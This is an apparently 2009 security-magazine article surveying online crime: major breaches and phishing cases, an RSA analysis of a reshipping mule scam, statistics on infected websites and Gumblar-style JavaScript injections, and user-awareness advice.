Online crime is evolving rapidly in a much sophisticated and advanced manner worldwide. This article gives you a wide view of current state of online crime and technological and methodical advancements in this space.

An unknown Indian hacker was charged with the greatest cyber-heist in history in 2008, for allegedly helping a criminal gang steal identities of an estimated eight million people in a hacking raid that could ultimately net more than £2.8 billion in illegal funds.

An investigation by Scotland's Sunday Herald newspaper discovered, that late on Thursday night, a previously unknown Indian hacker successfully breached the IT defences of UK's Best Western Hotel group's online booking system. He then sold details of how to access it through an underground network operated by the Russian mafia.

The attack scooped up the personal details of every single customer that has booked into one of Best Western's 1312 continental hotels since 2007. Amounting to a complete identity-theft kit, the stolen data includes a range of private information including home addresses, telephone numbers, credit card details and place of employment.

In another incident, US and Egyptian authorities have charged 100 people with conducting a phishing operation that siphoned at least $1.5m from thousands of accounts belonging to Bank of America and Well Fargo customers, in the month of October, this year. Fifty-three defendants from California, Nevada and North Carolina were named in a federal indictment unsealed Wednesday. Prosecutors said it was the largest number of defendants ever charged in a cybercrime case. Authorities in Egypt charged an additional 47 people.

According to the indictment, the Egypt-based defendants phished individuals' personal information and then used it to access victims' bank accounts. The phishers then worked with their counterparts in the US so money could be transferred into fraudulent accounts created specifically to receive the stolen funds.

These are very few shocking examples of today’s horrifying online crime. Latest reports confirm that the web is now an integral tool for criminals looking to make money (not merely mischief). Malware-infected systems are used as network of bots for a wide variety of inappropriate activities.

Why is online crime on surge?

Online criminals are quieter, and sneakier. Online criminals have realized that committing crimes over the Internet has certain advantages. Firstly, online crime is low risk; since it transcends geo-political borders, it is difficult for law enforcement agencies to catch the perpetrators. Moreover, the costs of conducting cross-border investigations and prosecutions can be high, meaning this is only worth doing in major cases. Secondly, online crime is easy: there is extensive documentation on hacking and virus writing freely available on the Internet, meaning that no sophisticated knowledge or skill is required. These are the two main factors which have lead to online crime becoming a multi-billion dollar industry, truly a self sustaining eco-system of its own.

Internet fraud losses reported in the United States reached a record high $264.6 million in 2008, according to a report released from the Internet Fraud Complaint Center, run by the FBI and the National White Collar Crime Center. Online scams originating from across the globe -- mostly from the United States, Canada, Britain, Nigeria and China -- are gathering steam this year with a nearly 50 percent increase in complaints reported to U.S. authorities in March 2009 alone.

Fraudulent sales on online auction sites like eBay Inc and classified sites like craigslist.com contributed to a 32 percent rise in the hottest area of online fraud -- non-delivery of promised merchandise, the report said. Other important areas included investment scams such as mini-versions of the $65 billion Ponzi scheme committed by New York financier Bernard Madoff in which money from new investors is used to pay existing investors.

About 74 percent of the scams were through e-mail messages last year, especially spam, while about 29 percent used websites. But criminals were increasingly tapping new technologies such as social networking sites and instant messenger services, said Kane. The report highlights one new "significant' identity-theft scam involving e-mail messages that give the appearance of originating from the FBI but seek bank account information to help in investigations of money being transferred to Nigeria. Recipients of the e-mails are told they could be richly rewarded by cooperating.

Both security companies and software developers wage a constant battle with online criminals; their aim is to develop protection for Internet users and software that is secure. Of course, online criminals constantly change their tactics in order to combat these countermeasures, and this has resulted in two marked current trends.

First of all, there is the deployment of malware using 0-day vulnerabilities. 0-day vulnerabilities are vulnerabilities for which a patch is not yet available, and they can be used to infect even fully up-to-date computer systems which are not running a dedicated security solution. 0-day vulnerabilities are a valuable commodity due to their potentially serious impact, and they usually sell for tens of thousands of dollars on the black market.

Secondly, experts are witnessing a spike in the type of malware designed to steal confidential information that can later be sold on the black market. Such information includes credit card numbers, bank account details, passwords for websites such as eBay or PayPal, and even passwords for online games such as World of Warcraft.

One of the obvious reasons why online crime has become so widespread is because it is profitable; this profitability will always drive the development of new online crime technologies.

Box Item — 1

How Big is The Threat?

Online crime is constantly evolving and fraudsters do not discriminate against any organization or person. Online attacks involving phishing, pharming and Trojans represent one of the most organized and sophisticated technological crime waves worldwide. Online criminals work day and night to steal identities, online credentials, credit card information, or any other information that they can efficiently monetize. They target organizations in all sectors, as well as any person who uses the Internet at work or at home.

Since last fall the RSA FraudAction Research Lab has tracked several different reshipping scams engineered by online fraudsters to “cash out” merchandise purchased using stolen payment cards through the involvement of mules. We will profile one such scam in-depth – Air Parcel Express – that was discovered by RSA.

The RSA FraudAction Research Lab uncovered the true inner workings of Air Parcel Express – a large scale, centralized reshipping service operated by criminals. The Lab researched and gathered information regarding its operation, the details of which are revealed here below. This information shold help Internet users and the security community better understand this threat and the mechanisms behind it.

The reshipping scam used a legitimate looking website to recruit drops. As shown in Figure 1, the website designed by the criminals behind the operation was meant to lend credibility to a fictitious shipping company, Air Parcel Express, Inc. The website featured in Figure 1 is no longer active. This was never a legitimate firm.

Figure 1 : AirParcelExpress.net 's home page

While “AirParcelExpress.net” was the front-end to what is meant to look like a legitimate business, a management tool located on another website served as its back-end operation. The management tool enabled the scammers to manage the mules they recruited and also provide their customers with the ability to track the merchandise they had previously carded as well as the mules they are assigned to carry out the rest of their operation.

After a customer signed up for the reshipping service, he could log in to the management tool using a username and password. RSA is aware of at least twenty-five customers that registered for the service. After registration, every customer is assigned one or more mules – in some cases up to twenty mules at a time. At the time of the analysis of this particular reshipping scam, 20 mules appeared to be active.

The mules recruited by the scammers behind Air Parcel Express reshipped the merchandise they received to addresses in Russia and Belarus. The recipients were either the scammers themselves or accomplices who received packages on behalf of the scammers. Again, after the packages reach their destinations, the merchandise they contain was likely resold on auction websites like eBay and through other means and the scammers forward a predetermined share of the proceeds to their customers.

RSA experts could not exactly ascertain the value of the reshipped merchandise through Air Parcel Express but they have made some rough estimates:

– If most of the customers follow the classic 30/70 split of the profits offered by the scammers, about USD$ 6,000 was paid to nine fraudster customers.

– This represents approximately one-third of the total merchandise value; just over USD$18,000.

– Since it can take up to two weeks to card an item to a U.S. address and then have it reshipped to another country, RSA estimates that over USD$36,000 worth of merchandise was cashed out every month during its operation.

Statistics

In addition to recent developments in the area of online crime, another marked trend is the distribution of malware via the World Wide Web. In recent years, however, the Web has become the main distribution point for malware. Malicious programs are hosted on websites; users are then either tricked into running these programs manually, or exploits are used to execute the malware automatically on victim machines.
Over the past three years, we've monitored between 100,000 and 300,000 otherwise "clean" websites in order to identify when they become distribution points for malware. The number of websites monitored has grown over time as more domains have been registered.

Table:-

The table above shows the maximum recorded infection rate for monitored websites throughout the year. There has been a sharp rise from the roughly 1 infected website in every 20,000 or so websites in 2006 to the current maximum of 1 infected website in every 150 at the beginning of 2009. The percentage of infected websites fluctuates at around this number. This may mean saturation point has been reached, where all the websites that can be infected have been. However, the number rises and falls as new vulnerabilities and tools are discovered that allow attackers to take over new hosts.
The next two tables show the malware most commonly detected on websites in 2008 and 2009.

Top 10 infections - 2008

Top 10 infections - 2009

In 2008, Trojan-Clicker.JS.Agent.h was found in the vast majority of cases, followed closely by Trojan-Downloader.JS.Iframe.oj.

Example of a page source infected with Trojan-Clicker.JS.Agent.h

Decoded Trojan-Clicker.JS.Agent.h

Trojan-Clicker.JS.Agent.h is a typical example of what most website malware injections looked like in 2008 and still look like in 2009. A small fragment of JavaScript code is added, which is usually obfuscated to prevent analysis. In the code shown above, the obfuscation simply consists of the ASCII characters which form the malicious code being converted into their hex codes. Once decoded, the code is usually an iframe which leads to a website hosting exploits. The IP address will vary and there are many deployment points. The entry page in the malicious website usually hosts exploits for IE, Firefox and Opera. Trojan-Downloader.JS.Iframe.oj, which was the second most common piece of malware, works in a very similar way.

There were two very interesting cases in 2009, the first of which was Net-Worm.JS.Aspxor.a. Although .this malware was detected back in July 2008, in 2009 it became far more widespread. It works by using a kit which finds SQL injection vulnerabilities in websites which are then used to insert malicious iframes.
Another very interesting case is "Gumblar", named after the Chinese domain that was used as an exploitation point. The "gumblar" string, visible in the obfuscated JavaScript which is added to websites, is a clear sign that a website has been compromised.

Typical Gumblar injection in a website

Once deobfuscated, the malicious Gumblar code looks like this:

Decoded Gumblar script

The "gumblar.cn" domain has been taken down, but unfortunately, the bad guys have since switched to new domains which are being used to conduct similar attacks.
Phishing Attacks per Month: For the third consecutive month, the number of phishing attacks identified by RSA in a single month has hit a record-breaking high, reaching 17,900 attacks in October. While standard phishing attacks dropped last month by eight percent, fast-flux attacks, which are mostly launched by the Rock Phish gang, rose by 13 percent. For six consecutive months, fast-flux attacks outnumbered attacks hosted using other methods such as hijacked websites, hijacked PCs and free or commercial web hosting services.

Figure : Phising figure - Source: RSA Anti-Fraud Command Center

Infection and distribution methods

There are currently three main ways in which websites can become infected with malware. The first popular method is to use vulnerabilities in the website itself, for instance a SQL injection, which allow the addition of malicious code. Attack tools such as ASPXor demonstrate this method: they can be used for mass scanning and injection of malware for thousands of IP addresses at a time. Such attacks can often be seen in web server access logs.

The second method involves infecting a web developer's machine with malware which monitors the creation and upload of HTML files and then injects malicious code into these files.

Finally, the last common method is to infect a web developer or somebody with access to the hosting account with a password stealing Trojan (eg. Trojan-ansom.Win32.Agent.ey). Usually, the password stealing Trojan will contact a server via HTTP to transmit ftp account passwords which have been harvested from popular ftp tools such as FileZilla or CuteFtp. The server side component then logs the account access information in an SQL database. Later, a server side tool will go through the SQL database, log into all the ftp accounts, fetch the index page, append the Trojanized code and then re-upload the page.

Because in this last method the hosting account access details are compromised, it's quite common for websites to get infected, for the developers to notice the infection or be alerted to it by site visitors, and for the site to be cleaned, only for it to be infected again the very next day.

Example of a website (*.*.148.240) which gets infected, then cleaned, then infected again

Another common situation is when different cybercriminal groups get hold of the same vulnerability or hosting account details at the same time. A battle then begins, with each group attempting to infect the website with their piece of malware. An example of this is given below:

Sample scan report of a website (*.*.176.6) with multiple infections

On 11.06.2009, the website being monitored was clean; it was infected with Trojan-Clicker.JS.Agent.gk on 05.07.2009. Later, on 15.07.2009 a new piece of malware, Trojan-Downloader.JS.Iframe.bin, was injected into the website. Ten days later, the malware was replaced again. This is relatively common and many websites actually contain a number of pieces of malware, appended one after the other, which have been placed there by different online criminal groups.

Distribution of Attacks by Hosting Method: The segmentation of phishing attacks according to the method used to host them remained similar in October to that of the month prior. As compared to September, attacks hosted on fast-flux networks rose three percent, as did attacks hosted on hijacked websites. Attacks hosted at commercial web hosting facilities fell four percent, while attacks hosted on hijacked computers and free hosting services both dropped one percent.

Figure: Distribution of Attacks

Top Ten Countries by Attack Volume : Overall, online criminals continue to attack brands in the ame countries, with the U.S. and UK suffering a combined 9 percent of attacks in October. Attacks on Indian and hinese brands seem to be gaining momentum within the past six months, as both countries have now appeared on this list for six and four consecutive months, respectively. Newcomers to the list in October were Greece and Malaysia, while Ireland and Spain dropped off the list completely.

Figure: Top Ten Countries by Attacks

Box Item — 2

Conclusion

Online crime has evolved with very sophisticated and technically advanced way. Online criminals today have new tools at their disposal and are able to adapt more quickly than ever with advanced crimeware; rapidly deployed using stealth mechanisms. Their supply chains have evolved to match that of the legitimate business world. There are now over a hundred times more infected websites on the Internet than three years ago. High profile, high traffic websites are a valuable commodity for online criminals, as the pool of potential victims that can be infected via such websites will be larger than usual.

For Internet users, there are several factors which increase the risk of falling victim to websites booby-trapped with malicious code. These include the use of pirated software, failure to install security patches, failure to run a security solution, and a general lack of awareness/ knowledge of Internet threats. Another risk factor is failure to install a security solution. Even if the system itself is up to date, it could be infected via 0-day vulnerabilities in third party software. Security solutions are usually updated far more quickly than software patches are produced, and provide a much-needed layer of protection during the vulnerability window.

While patching is important in helping keep computers secure, the 'human factor' also plays a role. For instance, a user might try to watch a 'funny clip' s/he's downloaded from the Internet – which turns out to be malware. Some websites will actually attempt to use this trick if exploits fail to infect the system. This example shows why users need to be aware of Internet threats, and particularly those associated with Web 2.0 social networks, which have recently been increasingly targeted by online criminals.
Technology alone can not protect your data/information from criminals, until and unless, as a user you posses basic security awareness and knowledge. It is very important to understand that a combined effort of technology and user’s awareness always produce better result than isolated efforts.

—By: Tanu Srivastava, 'InfoSecurity' Bureau.